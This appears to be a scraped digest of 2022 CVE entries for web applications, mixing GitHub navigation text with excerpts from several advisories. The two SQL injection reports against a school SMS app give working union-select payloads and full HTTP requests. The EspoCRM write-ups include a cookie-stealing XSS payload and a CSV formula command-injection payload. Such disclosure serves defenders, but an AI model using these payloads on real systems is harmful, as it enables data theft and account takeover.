TestLink v1.9.20 was discovered to contain a SQL injection vulnerability via /lib/execute/execNavigator.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Changelog
    
*   *   By Size
    *   Enterprise
    *   Teams
    *   Compare all
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-35193: GitHub - HuangYuHsiangPhone/CVEs

Craft CMS 4.2.0.1 is vulnerable to Cross Site Scripting (XSS) via src/helpers/Cp.php.

@@ -1620,7 +1620,7 @@ private static function \_fldTabHtml(FieldLayoutTab $tab, bool $customizable): st $customizable ? 'draggable' : null, \]), \]) . Html::tag('span', $tab\->name) . Html::tag('span', Html::encode($tab\->name)) . ($customizable ? Html::a('', null, \[ 'role' => 'button', @@ -1722,7 +1722,7 @@ private static function \_fldFieldSelectorsHtml(string $groupName, array $groupFi \]), 'data' => \['name' => mb\_strtolower($groupName)\], \]) . Html::tag('h6', $groupName) . Html::tag('h6', Html::encode($groupName)) . implode('', array\_map(fn(BaseField $field) => self::\_fldElementSelectorHtml($field, true, \[ 'class' => array\_filter(\[ $fieldLayout\->isFieldIncluded($field\->attribute()) ? 'hidden' : null,

CVE-2022-37248: More XSS vulnerabilities · craftcms/cms@cedeba0

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/modstudent/index.php?view=view&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/modstudent/index.php?view=view&id=

Vulnerability location: /activity/admin/modules/modstudent/index.php?view=view&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/modstudent/index.php?view=view&id=-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /activity/admin/modules/modstudent/index.php?view\=view&id\=\-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38833: bug_report/SQLi-2.md at main · saluteSUC/bug_report

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/department/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/department/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/department/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/department/index.php?view=edit&id=-3%27%20union%20select%201,database(),3--+ // Leak place ---> id

GET /activity/admin/modules/department/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38832: bug_report/SQLi-1.md at main · saluteSUC/bug_report

Cross Site Scripting in Import feature in EspoCRM 7.1.8 allows remote users to run malicious JavaScript in victim s browser via sending crafted csv file containing malicious JavaScript to authenticated user. Any authenticated user importing the crafted CSV file may end up running the malicious JavaScripting in the browser.

**Affected Product and Version:** EspoCRM 7.1.8

**Description**: EspoCRM is an open-source CRM (customer relationship management) software written in PHP. This web application enables users to see and manage company relationships. EspoCRM version 7.1.8 is vulnerable to Cross Site Scripting, allowing attackers to run malicious JavaScript on the browser. Administrator users can import contacts through the CSV file. Attackers can craft a CSV file containing JavaScript payloads and send it to the Administrator. JavaScript payload gets executed on import.

**Impact:** The attacker may access the session ID of the victim and send it to a remote server. Under this situation, the attacker may use this session ID to get control of the Administrator user and perform all the actions an administrator can perform. The attacker can deface the website and steal the credentials of the administrator user.

**Steps to reproduce:**

1.  Craft a CSV file containing a malicious JavaScript payload

2\. Log in to the application as an administrator user. Navigate to Administrator>> Import

3\. Click New import and choose the CSV file (as shown in step 1) containing the malicious payload

4\. Observe that payload gets executed on the browser

5\. We can even retrieve Cookie details using payload “><script>alert(document.cookie)</script>

**Remediation:**

Upgrade to the latest stable version of EspoCRM 7.1.9

CVE-2022-38845: EspoCRM 7.1.8 is vulnerable to Cross Site Scripting

CSV Injection in Create Contacts in EspoCRM 7.1.8 allows remote authenticated users to run system commands via creating contacts with payloads capable of executing system commands. Admin user exporting contacts in CSV file may end up executing the malicious system commands on his system.

**Affected Product and Version:** EspoCRM 7.1.8

**Description**: EspoCRM is an open-source CRM (customer relationship management) software written in PHP. This web application enables users to see and manage company relationships. EspoCRM version 7.1.8 is vulnerable to CSV injection allowing authenticate users to run system commands on the end user’s system by injecting CSV payloads in the input fields while creating contacts and accounts.

**Impact:** There is no direct impact on the application. It depends on the machine/system where the victim tries to open the file. Suppose a malicious CSV file is opened on the machine attached to an organization. In that case, it will allow the attacker to gain access to the device and launch other attacks against the organization.

**Steps to reproduce:**

1\. Log in to the application as a regular user and navigate to Contacts -> Create Contacts

2\. Insert a payload (A CSV formula is used as a payload, i.e. \[=cmd|’/C notepad’!’ A1’\] in the first name and last name. Click the save button to create the contact

3\. Log in to the application as an administrator (admin user). Navigate to contacts and select the highlighted option. Click export from the actions list. Export the file in CSV format

4\. Open the downloaded file. Observe that the formula is executed, and Notepad opens up (this is a sample formula to open the Notepad, the attacker can use more advanced payloads to run exploits on the end user’s machine)

**Note**: More advanced CSV payloads can be used to run other system commands.

**Remediation:**

Update to EspoCRM 7.1.9.

CVE-2022-38844: EspoCRM 7.1.8 is vulnerable to CSV Injection - Cybersecurity@ValueLabs - Medium

EspoCRM version 7.1.8 is vulnerable to Missing Secure Flag allowing the browser to send plain text cookies over an insecure channel (HTTP). An attacker may capture the cookie from the insecure channel using MITM attack.

**Affected Product and Version:** EspoCRM 7.1.8

**Description**: EspoCRM is an open-source CRM (customer relationship management) software written in PHP. This web application enables users to see and manage company relationships. EspoCRM version 7.1.8 is vulnerable to Missing Secure Flag, allowing the browser to send plain text cookies over an insecure channel (HTTP). The attacker may capture the cookie from the insecure channel using a MITM attack.

**Impact:** The attacker may use the captured cookie to access the application as an authenticated user and perform actions a genuine user can perform. The impact varies depending on the role of the compromised user.

**Steps to reproduce:**

1\. Log in to the application

2\. Capture the response to the login request. Observe that the secure flag is missing

**Remediation:**

Upgrade to the latest stable version of EspoCRM 7.1.9

CVE-2022-38846: EspoCRM 7.1.8 is vulnerable to Missing Secure Flag - Cybersecurity@ValueLabs - Medium

EspoCRM version 7.1.8 is vulnerable to Unrestricted File Upload allowing attackers to upload malicious file with any extension to the server. Attacker may execute these malicious files to run unintended code on the server to compromise the server.

**Affected Product and Version:** EspoCRM 7.1.8

**Description**: EspoCRM is an open-source CRM (customer relationship management) software written in PHP. This web application enables users to see and manage company relationships. EspoCRM version 7.1.8 is vulnerable to Unrestricted File Upload allowing attackers to upload a malicious file with any extension to the server. The attacker may execute these malicious files to run unintended code on the server to compromise the server.

**Impact:** The attacker may run malicious code on the server and compromise the confidentiality, integrity, and availability of the server and application.

**Steps to reproduce:**

1\. Log in to the application

2\. Go to the profile page and upload the file with the HTML extension

3\. Access the uploaded file and observe that it gets uploaded successfully

**Remediation:**

Upgrade to the latest stable version of EspoCRM 7.1.9

CVE-2022-38843: EspoCRM 7.1.8 is vulnerable to Unrestricted File Upload

Rocket LMS version 1.6 suffers from a remote SQL injection vulnerability.

Rocket LMS 1.6 SQL Injection

An issue in the component post_applogin.php of Super Flexible Software GmbH & Co. KG Syncovery 9 for Linux v9.47x and below allows attackers to escalate privileges via creating crafted session tokens.

Tag

#php